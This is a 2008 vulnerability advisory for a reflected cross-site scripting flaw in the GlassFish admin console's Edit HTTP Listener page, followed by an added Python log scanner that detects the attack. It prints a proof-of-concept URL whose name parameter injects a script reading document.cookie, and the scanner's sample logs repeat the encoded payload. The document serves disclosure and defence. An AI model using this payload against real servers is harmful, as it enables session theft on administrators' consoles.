XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

2008-06-10 / 2008-06-11
Credit: Eduardo Jorge
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

==============================
XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 10 June 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Description:

This vulnerability was found in the Edit HTTP Listener section of the Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config

--
|_|0|_|  Serrano Neves - a.k.a eth0
|_|_|0|  http://webappsecurity.wordpress.com
|0|0|0|

"Talk is cheap. Show me the code." - Linus Torvalds

References:

http://seclists.org/bugtraq/2008/Jun/0087.html
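
A log check for the request described in the advisory, added here as an example (not part of the original advisory and not GlassFish code): it flags requests to httpListenerEdit.jsf whose name parameter decodes to markup characters. The Common Log Format input, the sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Page named in the advisory; matched on path only, so any host/port works.
TARGET_PATH = "/configuration/httpListenerEdit.jsf"
# Characters with no place in a listener name that allow markup injection.
MARKUP = re.compile(r"[<>\"'`]")
# Request field of a Common Log Format line (the log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_name(uri, max_decodes=3):
    """Return the decoded `name` value if it carries markup characters, else None."""
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("name", []):
        # parse_qs has decoded once; decode again in case a proxy or logger
        # re-encoded the URI before it was written.
        for _ in range(max_decodes):
            if MARKUP.search(value):
                return value
            value = unquote(value)
    return None

def scan(lines):
    """Return [(client_ip, decoded_name)] for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        value = suspicious_name(match.group(1)) if match else None
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    f'192.0.2.10 - - [10/Jun/2008:10:01:02 +0000] "GET {TARGET_PATH}?name=http-listener-1&configName=server-config HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Jun/2008:10:02:40 +0000] "GET {TARGET_PATH}?name=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E&configName=server-config HTTP/1.1" 200 5301',
    f'198.51.100.7 - - [10/Jun/2008:10:03:11 +0000] "GET {TARGET_PATH}?name=%253Cscript%253E&configName=server-config HTTP/1.1" 200 5290',
    '192.0.2.10 - - [10/Jun/2008:10:04:00 +0000] "GET /other/page.jsf?name=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent markup in name: {value!r}")
```
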

